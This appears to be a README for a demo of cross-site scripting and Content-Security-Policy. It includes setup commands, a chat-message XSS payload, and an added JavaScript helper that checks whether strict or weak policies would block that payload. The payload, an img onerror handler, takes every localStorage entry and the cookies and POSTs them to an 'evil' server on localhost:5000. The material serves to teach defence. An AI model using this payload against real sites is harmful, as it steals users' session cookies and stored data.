Cross-site scripting demo to demonstrate Content-Security-Policy
Make sure you're using Node.js 10.x or greater.
Open a terminal and navigate to the project's root directory.
yarn install
yarn start:server
yarn start:client
yarn start:evil
How's it going? <img style="display:none;" src="http://url.to.file.which/not.exist" onerror="fetch('http://localhost:5000', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ localStorage: Object.entries(localStorage).map(e => `${e[0]}=${e[1]}`), cookies: document.cookie })}); alert(`I just stole your auth cookie ${document.cookie} and the contents of your localStorage ${Object.entries(localStorage).map(e => `${e[0]}=${e[1]}`)}`);">
evilServer.js - You'll see both the sender (attacker) and recipient's cookies and localStorage have been stolen and logged!
evilServer.js reveals that the attacker didn't receive any information.
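
The following is an added example, not code from this project: a simplified check of whether a given Content-Security-Policy would let the message payload above run its inline `onerror` handler and `fetch()` to `http://localhost:5000`. The client origin `http://localhost:3000`, the two sample policies and the Express-style middleware shape are assumptions.

```javascript
const APP_ORIGIN = 'http://localhost:3000';  // assumption: origin serving the client
const EVIL_ORIGIN = 'http://localhost:5000'; // fetch() target in the payload on this page
const STRICT_CSP = "default-src 'self'; script-src 'self'; connect-src 'self'"; // constructed
const WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline'; connect-src *"; // constructed

// Parse a policy into { directive: [sources] }; a repeated directive is ignored.
function parseCsp(policy) {
  const map = Object.create(null);
  for (const part of policy.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/);
    const key = name.toLowerCase();
    if (key && !(key in map)) map[key] = sources;
  }
  return map;
}

// First listed directive that is present, else null (no restriction).
function effective(map, ...names) {
  for (const n of names) if (map[n]) return map[n];
  return null;
}

// Inline handlers like onerror="..." need 'unsafe-inline', which browsers ignore
// when a nonce or hash is also listed. ('unsafe-hashes' is not modelled here.)
function allowsInlineHandlers(map) {
  const src = effective(map, 'script-src-attr', 'script-src', 'default-src');
  if (src === null) return true;
  const nonceOrHash = src.some(s => /^'(nonce|sha(256|384|512))-/.test(s));
  return src.includes("'unsafe-inline'") && !nonceOrHash;
}

// connect-src match for fetch(); covers *, 'self', scheme and exact host sources only.
function allowsConnect(map, target, self) {
  const src = effective(map, 'connect-src', 'default-src');
  if (src === null) return true;
  const t = new URL(target);
  return src.some(s => s === '*' || s === t.protocol || s === t.origin ||
    s === t.host || (s === "'self'" && t.origin === new URL(self).origin));
}

// What the page's payload could do under a given policy.
function payloadOutcome(policy, self = APP_ORIGIN) {
  const map = parseCsp(policy);
  return { handlerRuns: allowsInlineHandlers(map),
           exfilAllowed: allowsConnect(map, EVIL_ORIGIN, self) };
}

// Express-style middleware (assumed server shape) sending the strict policy.
function cspMiddleware(req, res, next) {
  res.setHeader('Content-Security-Policy', STRICT_CSP);
  next();
}
```

`payloadOutcome(STRICT_CSP)` reports that neither the handler nor the exfiltration request is permitted, while `payloadOutcome(WEAK_CSP)` reports that both are.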